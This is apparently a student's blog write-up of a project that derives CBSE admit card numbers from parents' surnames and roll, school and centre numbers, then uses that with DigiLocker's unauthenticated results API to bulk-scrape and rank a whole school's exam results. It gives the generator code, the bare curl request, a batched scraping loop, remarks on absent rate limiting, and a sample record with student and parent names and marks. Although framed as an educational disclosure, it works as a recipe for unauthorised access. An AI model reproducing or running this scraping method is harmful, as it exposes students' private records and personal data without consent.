CBSE Wrapped

Background

On the day of results, I found this (since deleted) post on Reddit which explained the algorithm behind how Admit Card Numbers are generated. Since the algorithm was pretty trivial, I created a simple site to generate them, provided some basic information about the student (it also gave me a reason to learn Vue, but whatever).

What basic information, you may ask? Well, it only takes:

Father's Name
Mother's Name
Student's Rollnumber
School Number
and Center Number

to generate the admit card number and thereby view the results of any student.

Generating the Admit Card Numbers

The admit card number is composed of 8 characters.

The first character is the second-to-last letter of Father's Full Name.
The second character is the last letter of Mother's Full Name.
The third and fourth characters are the last 2 digits of the roll number.
The next two characters are the first 2 digits of the school number.
The last two characters are the middle 2 digits of the centre number.

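export function generate(
    fathersName: string,
    mothersName: string,
    studentRollNumber: string,
    schoolNumber: string,
    centerNumber: string,
): string {
    // Second-to-last letter of the father's full name
    const F = fathersName.at(-2) ?? "";
    // Last letter of the mother's full name
    const M = mothersName.at(-1) ?? "";
    // Last 2 digits of the roll number
    const RR = studentRollNumber.slice(-2);
    // First 2 digits of the school number
    const SS = schoolNumber.slice(0, 2);

    // Middle 2 digits of the centre number (e.g. "822285" -> "22")
    const half = Math.floor(centerNumber.length / 2) - 1;
    const CC = centerNumber.slice(half, half + 2);

    return (F + M + RR + SS + CC).toUpperCase();
}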

If the student was from my school (which they are), I would already have the school number and centre number. Getting their rollnumbers was also trivial since they are just sequential. The sole challenge was getting hold of the parents' names, but if you look carefully, the "last n letters of the parent's name" are extracted from the full name, i.e. the given name and surname combined.

This meant that, in theory, I could use just the student's full name, or in fact just the surname, to bypass this restriction. Which I did, and it worked for the 90% of students whose parents both share the student's surname.
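
The surname shortcut can be sketched as below. This is a minimal illustration rather than the code the site uses: `generateFromSurname` is a hypothetical helper, and it assumes both parents share the student's surname and that the surname has at least two letters.

```typescript
// Hypothetical helper: builds the admit card number from the student's
// surname alone, assuming both parents share that surname.
function generateFromSurname(
    surname: string,
    studentRollNumber: string,
    schoolNumber: string,
    centerNumber: string,
): string {
    const cleaned = surname.trim();
    // The father's second-to-last letter and the mother's last letter both
    // fall inside the shared surname, so the given names are never needed.
    const F = cleaned.slice(-2, -1);
    const M = cleaned.slice(-1);
    const RR = studentRollNumber.slice(-2);
    const SS = schoolNumber.slice(0, 2);
    const half = Math.floor(centerNumber.length / 2) - 1;
    const CC = centerNumber.slice(half, half + 2);
    return (F + M + RR + SS + CC).toUpperCase();
}

// Values taken from the sample response shown later in this post.
const admitCard = generateFromSurname("Verma", "15623245", "30058", "822285");
console.log(admitCard); // MA453022
```

The result matches the `ADMN_ID` field of the sample response, which is what makes the shortcut work whenever the surnames line up.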

Scraping the results

Then I realised that if I can view the results of any student, I could potentially view the results of all the students. And what is the easiest way to view all the results? To scrape them!!

So I started poking around in the Network panel of DevTools on DigiLocker's result website to see how the result is requested from the backend.

curl 'https://results.digilocker.gov.in/api/cbse/hscer/results' \
  -H 'accept: */*' \
  -H 'accept-language: en-US,en;q=0.6' \
  -H 'cache-control: no-cache' \
  -H 'content-type: application/x-www-form-urlencoded; charset=UTF-8' \
  -b 'Path=/' \
  -H 'origin: https://results.digilocker.gov.in' \
  -H 'pragma: no-cache' \
  -H 'priority: u=1, i' \
  -H 'referer: https://results.digilocker.gov.in/CBSE12th2026resultXIInruew.html' \
  -H 'sec-ch-ua: "Chromium";v="148", "Brave";v="148", "Not/A)Brand";v="99"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: same-origin' \
  -H 'sec-gpc: 1' \
  -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36' \
  -H 'x-requested-with: XMLHttpRequest' \
  --data-raw 'rroll=15623245&year=2026&admn_id=MA453022'

On stripping it down to the bare essentials:

curl 'https://results.digilocker.gov.in/api/cbse/hscer/results' \
  -H 'content-type: application/x-www-form-urlencoded' \
  --data-raw 'rroll=15623245&year=2026&admn_id=MA453022'

And what can we notice here? An absence of any auth headers or cookies (well, obviously, since the rollnumber and admit card number act as the auth info, but again, whatever).
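
For reference, the stripped-down request can be described in TypeScript roughly as follows. `buildResultRequest` and `ResultRequest` are hypothetical names (not taken from the scraper package); the helper only assembles the URL, header and form body shown in the curl command and leaves the actual sending to the caller.

```typescript
// Endpoint copied from the curl command above.
const RESULTS_URL = "https://results.digilocker.gov.in/api/cbse/hscer/results";

interface ResultRequest {
    url: string;
    method: "POST";
    headers: Record<string, string>;
    body: string;
}

// Hypothetical helper: assembles the form-encoded POST request.
function buildResultRequest(
    rollNumber: string,
    year: string,
    admitCardNumber: string,
): ResultRequest {
    const fields: Array<[string, string]> = [
        ["rroll", rollNumber],
        ["year", year],
        ["admn_id", admitCardNumber],
    ];
    // Encode each pair the way an HTML form would.
    const body = fields
        .map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`)
        .join("&");
    return {
        url: RESULTS_URL,
        method: "POST",
        headers: { "content-type": "application/x-www-form-urlencoded" },
        body,
    };
}

const resultRequest = buildResultRequest("15623245", "2026", "MA453022");
console.log(resultRequest.body); // rroll=15623245&year=2026&admn_id=MA453022
```

In a runtime that provides `fetch`, something like `fetch(resultRequest.url, resultRequest)` should be enough to send it, since no cookies or auth headers are involved.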

Taking advantage of this very primitive API request model, I wrote a simple script which, when fed with student names and rollnumbers, scrapes the results of all the school's students and combines them into a single JSON.

Fetching results failed for some students because their parents' surnames differed from their own, and those students were therefore discarded.
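
The scraping loop can be sketched as follows. It is an illustration under assumptions, not the actual script: `Student`, `Fetcher`, `chunk` and `scrapeAll` are hypothetical names, the network call is injected so the sketch stays independent of any HTTP client, and the default batch size of 10 mirrors the parallelism mentioned in the disclaimer section.

```typescript
interface Student {
    name: string;
    rollNumber: string;
}

// Hypothetical signature: resolves with the parsed response for one student,
// or rejects when the lookup fails (e.g. a wrong admit card number).
type Fetcher = (student: Student) => Promise<unknown>;

// Splits a list into consecutive batches of at most `size` items.
function chunk<T>(items: T[], size: number): T[][] {
    if (size < 1) throw new RangeError("size must be at least 1");
    const batches: T[][] = [];
    for (let i = 0; i < items.length; i += size) {
        batches.push(items.slice(i, i + size));
    }
    return batches;
}

// Fetches every student's result one batch at a time and collects the
// successes into a single object keyed by roll number. Failures are dropped.
async function scrapeAll(
    students: Student[],
    fetchResult: Fetcher,
    batchSize = 10,
): Promise<Record<string, unknown>> {
    const results: Record<string, unknown> = {};
    for (const batch of chunk(students, batchSize)) {
        const outcomes = await Promise.all(
            batch.map((student) =>
                fetchResult(student).then(
                    (value) => ({ ok: true as const, student, value }),
                    () => ({ ok: false as const, student }),
                ),
            ),
        );
        for (const outcome of outcomes) {
            if (outcome.ok) {
                results[outcome.student.rollNumber] = outcome.value;
            }
        }
    }
    return results;
}
```

Converting each rejection into an `ok: false` outcome keeps one failed lookup from aborting the rest of its batch.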

Cleaning and Compiling the Results

DigiLocker's API returns the result as a raw JSON object, which is then rendered on their website. But this JSON was too flat and cryptic to do any meaningful analysis on, so I fed it through a data cleaning pipeline which compiled the results down into a much more semantic structure.

You can find annotations for every field of the response here.

So something like this,

{
    "data": {
        "ADMN_ID": "MA453022",
        "CNAME": "DIVIJ VERMA",
        "FNAME": "SHIVENDER VERMA",
        "MNAME": "PRIYANKA VERMA",
        "SEX": "M",
        "CLASS": "XII",
        "SESSION": "2025-2026",
        "MONTH": "MAY",
        "MONTH_L": "",
        "DOD": "13/05/2026",
        "YEAR": "2026",
        "ORGID": "CBSE",
        "CENT": "822285",
        "SCH": "30058",
        "SCH_NAME": "D A V PUBLIC SCHOOL AUNDH PUNE MAHARASHTRA",
        "REG": "E",
        "PUBLISHED": "Y",
        "VERSION": "1",
        "MODIFIED_ON": "2026-05-13T12:09:28.252959Z",
        "RROLL": "15623245",
        "RROLL_YEAR": "15623245_2026",
        "URI": "in.gov.cbse-HSCER-156232452026",
        "SK": "30058#Y#15623245",
        "GSI_PK": "2026#E",
        "GSI_SK": "30058#Y#15623245",
        "RES": "PASS",
        "RESULT": "PASS",
        "COMPTT": "",
        "TMRK": "408",
        "CAT": "",
        "IS_NCHMCT": "N",
        "NCHMCT_1": "",
        "NCHMCT_2": "",
        "IS_NSE": "N",
        "NSE_1": "",
        "NSE_2": "",
        "IS_SKILL": "N",
        "SKILL_1": "",
        "SKILL_2": "",
        "SNAME1": "ENGLISH CORE",
        "SUB1": "301",
        "SNAME2": "MATHEMATICS",
        "SUB2": "041",
        "SNAME3": "PHYSICS",
        "SUB3": "042",
        "SNAME4": "CHEMISTRY",
        "SUB4": "043",
        "SNAME5": "INFORMATICS PRACTICE",
        "SUB5": "065",
        "SNAME6": "",
        "SUB6": "",
        "PF1": "P",
        "PF2": "P",
        "PF3": "P",
        "PF4": "P",
        "PF5": "P",
        "PF6": "",
        "GR1": "C1",
        "GR2": "A2",
        "GR3": "A1",
        "GR4": "B1",
        "GR5": "A2",
        "GR6": "",
        "MRK11": "055",
        "MRK12": "019",
        "MRK13": "074",
        "MRK13_WRDS": "SEVENTY FOUR",
        "MRK21": "061",
        "MRK22": "020",
        "MRK23": "081",
        "MRK23_WRDS": "EIGHTY ONE",
        "MRK31": "053",
        "MRK32": "029",
        "MRK33": "082",
        "MRK33_WRDS": "EIGHTY TWO",
        "MRK41": "050",
        "MRK42": "027",
        "MRK43": "077",
        "MRK43_WRDS": "SEVENTY SEVEN",
        "MRK51": "064",
        "MRK52": "030",
        "MRK53": "094",
        "MRK53_WRDS": "NINETY FOUR",
        "MRK61": "",
        "MRK62": "",
        "MRK63": "",
        "MRK63_WRDS": "",
        "ISNAME1": "WORK EXPERIENCE",
        "ISNAME2": "HEALTH & PHYSICAL EDUCATION",
        "ISNAME3": "GENERAL STUDIES",
        "ISUB1": "500",
        "ISUB2": "502",
        "ISUB3": "503",
        "IGR1": "A1",
        "IGR2": "A1",
        "IGR3": "A1"
    },
    "duration_sec": 0.021338,
    "request_id": "1182ed64-cb23-4ea8-8465-f95212775acf",
    "status": 200
}

got compiled into:

{
    "roll_number": 15623245,
    "name_candidate": "DIVIJ VERMA",
    "name_father": "SHIVENDER VERMA",
    "name_mother": "PRIYANKA VERMA",
    "sex": "M",
    "catagory": false,
    "candidate_type": "regular",
    "stream_id": "4ab90d1e-b4d6-4066-9663-fa43fa76de3c",
    "total_primary_subjects": 5,
    "primary_subjects": {
        "sub_1": {
            "subject_id": "301",
            "passed": true,
            "grade": "C1",
            "marks_theory": 55,
            "marks_practicals": 19,
            "marks_total": 74,
            "marks_total_words": "SEVENTY FOUR",
            "percentage": 74.0,
            "percentile_all_streams": 6.551724137931035,
            "rank_same_stream": 49,
            "rank_all_streams": 135
        },
        "sub_2": {
            "subject_id": "041",
            "passed": true,
            "grade": "A2",
            "marks_theory": 61,
            "marks_practicals": 20,
            "marks_total": 81,
            "marks_total_words": "EIGHTY ONE",
            "percentage": 81.0,
            "percentile_all_streams": 53.09278350515464,
            "rank_same_stream": 26,
            "rank_all_streams": 44
        },
        "sub_3": {
            "subject_id": "042",
            "passed": true,
            "grade": "A1",
            "marks_theory": 53,
            "marks_practicals": 29,
            "marks_total": 82,
            "marks_total_words": "EIGHTY TWO",
            "percentage": 82.0,
            "percentile_all_streams": 59.009009009009006,
            "rank_same_stream": 23,
            "rank_all_streams": 44
        },
        "sub_4": {
            "subject_id": "043",
            "passed": true,
            "grade": "B1",
            "marks_theory": 50,
            "marks_practicals": 27,
            "marks_total": 77,
            "marks_total_words": "SEVENTY SEVEN",
            "percentage": 77.0,
            "percentile_all_streams": 47.2972972972973,
            "rank_same_stream": 28,
            "rank_all_streams": 58
        },
        "sub_5": {
            "subject_id": "065",
            "passed": true,
            "grade": "A2",
            "marks_theory": 64,
            "marks_practicals": 30,
            "marks_total": 94,
            "marks_total_words": "NINETY FOUR",
            "percentage": 94.0,
            "percentile_all_streams": 49.056603773584904,
            "rank_same_stream": 26,
            "rank_all_streams": 26
        },
        "sub_6": null
    },
    "secondary_subjects": [
        { "subject_id": "500", "grade": "A1" },
        { "subject_id": "502", "grade": "A1" },
        { "subject_id": "503", "grade": "A1" }
    ],
    "cleared_all_subjects": true,
    "result_status": "pass",
    "compartment_subject_codes": "",
    "total_marks": 408,
    "percentage": 81.6,
    "percentile_same_stream": 47.16981132075472,
    "percentile_all_streams": 45.17241379310345,
    "rank_same_stream": 28,
    "rank_all_streams": 79
}
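
The mapping between the two shapes can be illustrated with a small sketch. It is not the actual pipeline (which is written in Python with Pydantic models); `parseSubjects`, `toMarks` and the types are hypothetical, and the reading of `MRKn1`, `MRKn2` and `MRKn3` as theory, practical and total marks is inferred from the sample above.

```typescript
type RawResult = Record<string, string>;

interface SubjectResult {
    subject_id: string;
    passed: boolean;
    grade: string;
    marks_theory: number | null;
    marks_practicals: number | null;
    marks_total: number | null;
}

// Marks arrive as zero-padded strings such as "055"; empty means "no value".
function toMarks(value: string | undefined): number | null {
    return value === undefined || value === "" ? null : parseInt(value, 10);
}

// Hypothetical helper: collects the numbered SUBn / PFn / GRn / MRKn* fields
// of the raw response into one entry per subject slot (null for empty slots).
function parseSubjects(raw: RawResult, slots = 6): Array<SubjectResult | null> {
    const subjects: Array<SubjectResult | null> = [];
    for (let n = 1; n <= slots; n++) {
        const subjectId = raw[`SUB${n}`] ?? "";
        if (subjectId === "") {
            subjects.push(null);
            continue;
        }
        subjects.push({
            subject_id: subjectId,
            passed: raw[`PF${n}`] === "P",
            grade: raw[`GR${n}`] ?? "",
            marks_theory: toMarks(raw[`MRK${n}1`]),
            marks_practicals: toMarks(raw[`MRK${n}2`]),
            marks_total: toMarks(raw[`MRK${n}3`]),
        });
    }
    return subjects;
}

// A two-slot excerpt of the sample response above.
const sampleRaw: RawResult = {
    SUB1: "301", PF1: "P", GR1: "C1", MRK11: "055", MRK12: "019", MRK13: "074",
    SUB2: "", PF2: "", GR2: "", MRK21: "", MRK22: "", MRK23: "",
};
console.log(parseSubjects(sampleRaw, 2));
```

For the excerpt, the first slot becomes an object with marks 55, 19 and 74, and the empty second slot becomes `null`, mirroring `sub_6` in the compiled output.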

I further extracted common subject groups to form streams and then inferred the stream of each student. Then I calculated the subject-wise and aggregate percentages to rank the students by stream and across the whole school.
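
A rough sketch of the aggregate and ranking step follows. The real pipeline uses Pandas; the function and type names here are hypothetical, every subject is assumed to be marked out of 100, and tied students are assumed to share the best rank, which may differ from what the pipeline does. The roll numbers and stream names in the example are made up.

```typescript
interface StudentScore {
    roll_number: number;
    stream_id: string;
    subject_totals: number[]; // marks_total of each primary subject
}

interface RankedStudent {
    roll_number: number;
    percentage: number;
    rank_same_stream: number;
    rank_all_streams: number;
}

// With every subject out of 100, the aggregate percentage is the mean total.
function aggregatePercentage(subjectTotals: number[]): number {
    if (subjectTotals.length === 0) throw new RangeError("no subjects given");
    const sum = subjectTotals.reduce((acc, marks) => acc + marks, 0);
    return sum / subjectTotals.length;
}

// Rank = 1 + number of students with a strictly higher percentage.
function rankStudents(students: StudentScore[]): RankedStudent[] {
    const scored = students.map((s) => ({
        roll_number: s.roll_number,
        stream_id: s.stream_id,
        percentage: aggregatePercentage(s.subject_totals),
    }));
    return scored.map((s) => ({
        roll_number: s.roll_number,
        percentage: s.percentage,
        rank_all_streams: 1 + scored.filter((o) => o.percentage > s.percentage).length,
        rank_same_stream:
            1 +
            scored.filter((o) => o.stream_id === s.stream_id && o.percentage > s.percentage)
                .length,
    }));
}

// Made-up students; the first one reuses the subject totals of the sample.
const rankedStudents = rankStudents([
    { roll_number: 1, stream_id: "stream-a", subject_totals: [74, 81, 82, 77, 94] },
    { roll_number: 2, stream_id: "stream-a", subject_totals: [90, 90, 90, 90, 90] },
    { roll_number: 3, stream_id: "stream-b", subject_totals: [74, 81, 82, 77, 94] },
    { roll_number: 4, stream_id: "stream-b", subject_totals: [60, 60, 60, 60, 60] },
]);
console.log(rankedStudents);
```

The sample's five totals add up to 408, giving the 81.6 shown in the compiled output.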

You can see a compiled result here.

The Architecture (the fun section)

The whole project is a polyglot (a fancy way of saying I used multiple languages) monorepo with the following packages:

scraper: TypeScript-based result scraper
result-compiler: Python-based result cleaning and compiling pipeline
app: A SvelteKit-based frontend
orchestrator: Scripts to coordinate between the different packages
data: A centralized package to store all the intermediate and processed data

Scraper

Written in TypeScript and run on the Bun runtime, it contains simple but extensible scraping functions.

Currently I only use the student's name and rollnumber (along with the school's common info) to scrape the results, but it can be easily extended to consume the parents' information, if anyone fancies that.

All JSON which goes in and out of here gets validated using Valibot schemas.
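
To illustrate the kind of check such a schema performs, here is a hand-written type guard. It is deliberately not Valibot code and not the project's schema; `ResultEnvelope`, `isRecord` and `isResultEnvelope` are hypothetical stand-ins that only check the outer shape of the response shown earlier.

```typescript
interface ResultEnvelope {
    status: number;
    data: Record<string, string>;
}

// True for plain, non-null, non-array objects.
function isRecord(value: unknown): value is Record<string, unknown> {
    return typeof value === "object" && value !== null && !Array.isArray(value);
}

// Hypothetical stand-in for a schema: accepts only objects with a numeric
// `status` and a `data` object whose values are all strings.
function isResultEnvelope(value: unknown): value is ResultEnvelope {
    if (!isRecord(value)) return false;
    if (typeof value["status"] !== "number") return false;
    const data = value["data"];
    if (!isRecord(data)) return false;
    return Object.keys(data).every((key) => typeof data[key] === "string");
}

const parsedResponse: unknown = JSON.parse(
    '{"status": 200, "data": {"RROLL": "15623245", "RESULT": "PASS"}}',
);
if (isResultEnvelope(parsedResponse)) {
    // Inside this branch the compiler knows the shape of the value.
    console.log(parsedResponse.data["RESULT"]); // PASS
}
```

A schema library expresses the same rules declaratively and usually reports which field failed, which a bare boolean guard like this does not.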

This package only exports the functions required to do the scraping, but the actual scraping and saving part is done within the orchestrator package.

Result Compiler

The core pipeline is written in Python, with the analysis done using Pandas. It is responsible for all the cleaning and data transformations, and is easily extensible to add new analysis parameters.

I decided on doing most of the computations and analysis once, during build time, using the frontend as a mere view layer for the results.

All transformation, validation and serialization of data in this step is controlled via Pydantic Models.

This package, in turn, exposes a CLI which is used by the orchestrator package to compile the scraped results.

App

A SvelteKit-based app which consumes the generated results. It prerenders all routes at build time and is hosted on GitHub Pages.

Orchestrator

The final piece which coordinates between all other packages.

The section with Disclaimer

The student names used in this project are fictitious and have been used for illustrative purposes only. Any resemblance to the names or results of actual students, past or present, is entirely coincidental.

This project is made only for educational purposes, and to demonstrate that, in a hypothetical scenario, if I was able to extract the results, then anyone could easily brute force* their way into scraping all the results.

*(Another thing I noticed was that DigiLocker's API doesn't seem to have any kind of rate limiting. I only ran 10 requests in parallel at once, but doing more should be possible without any issues.)

Each and every line of this project is handwritten, and LLMs were only used for OCR extraction of data from photos of student records.

Thank you for reading till the end ❤️.
See the Raw and Uncensored results.